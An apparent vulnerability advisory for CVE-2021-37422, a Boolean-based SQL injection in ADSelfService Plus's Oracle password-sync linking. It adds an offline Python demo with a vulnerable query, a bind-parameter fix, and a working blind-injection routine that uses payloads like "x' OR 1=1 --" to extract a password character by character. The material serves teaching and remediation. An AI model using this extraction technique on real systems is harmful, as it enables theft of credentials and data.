Zoho ManageEngine ADSelfService Plus: CVE-2021-37422: SQL Injection while linking the databases.

Severity: 7
CVSS (v2 vector): (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Published: Aug 26, 2021
Added: Dec 18, 2024
Modified: Jul 2, 2025

Description

A SQL injection vulnerability was discovered in ADSelfService Plus when password synchronization was enabled for Oracle Database. This issue has now been fixed. During account linking between Active Directory and Oracle Database for password synchronization, the supplied usernames were inserted into SQL queries without sanitization and sent to the linked Oracle Database, leaving the application vulnerable to Boolean-based SQL injection. Because each injected query answers only true or false, an attacker who succeeds can recover data one comparison at a time, with a resulting risk of data from ADSelfService Plus being exposed.
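The following is an added illustration of the bug class the description names, not code from ADSelfService Plus or from Zoho's fix. An in-memory SQLite database stands in for the linked Oracle Database so the example runs offline (Oracle would use ASCII()/SUBSTR and :name bind variables instead of unicode()/substr and ?). The table, rows, function names and the "username-exists" query shape are all constructed assumptions; the Boolean-based extraction loop shows why a true/false answer per query is enough to leak data, and the bind-parameter form is the standard remediation for this pattern.

```python
import sqlite3


def build_db():
    """Constructed sample data: an in-memory SQLite table standing in for the
    linked Oracle Database's user records (assumption, not the product schema)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "Winter2021!"), ("bob", "s3cret")],
    )
    return con


def lookup_vulnerable(con, username):
    """Hypothetical vulnerable account-linking check: the username is
    concatenated straight into the query text, so quote characters in it
    become SQL. Returns only True/False, which is all a Boolean-based
    injection needs."""
    sql = "SELECT COUNT(*) FROM users WHERE username = '" + username + "'"
    return con.execute(sql).fetchone()[0] > 0


def lookup_safe(con, username):
    """Hardened form: the username travels as a bind parameter and is
    never parsed as SQL, whatever characters it contains."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ?"
    return con.execute(sql, (username,)).fetchone()[0] > 0


def extract_password(probe, target_user, maxlen=32):
    """Boolean-based extraction through a true/false oracle.

    `probe(username)` is the application's lookup, called with injected
    usernames. Each character of the target row's password is recovered
    by binary search over its code point (about 7 queries per character),
    and a length check stops the loop at the end of the string."""
    recovered = ""
    subq = f"(SELECT password FROM users WHERE username='{target_user}')"
    for pos in range(1, maxlen + 1):
        # Is there a character at this position at all?
        if not probe(f"x' OR length({subq}) >= {pos} --"):
            break
        lo, hi = 0, 127  # search the ASCII code-point space
        while lo < hi:
            mid = (lo + hi) // 2
            cond = f"unicode(substr({subq}, {pos}, 1)) > {mid}"
            # The trailing ' from the original query is swallowed by the -- comment.
            if probe(f"x' OR {cond} --"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    con = build_db()
    # Vulnerable path: a tautology is accepted as a valid username.
    print("vulnerable, tautology:", lookup_vulnerable(con, "x' OR 1=1 --"))
    # Safe path: the same string is just a username that does not exist.
    print("safe, tautology:", lookup_safe(con, "x' OR 1=1 --"))
    # Leak alice's password through the vulnerable path one bit at a time.
    print("extracted:", extract_password(lambda u: lookup_vulnerable(con, u), "alice"))
```

Run against the safe lookup, extract_password returns an empty string because the first length probe is treated as a literal username and finds no row; against the vulnerable lookup it recovers the full password without ever seeing query output, which is exactly the exposure the advisory describes.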

Solution

Upgrade Zoho ManageEngine ADSelfService Plus to the latest release (solution reference: zoho-manageengine-adselfservice-plus-upgrade-latest).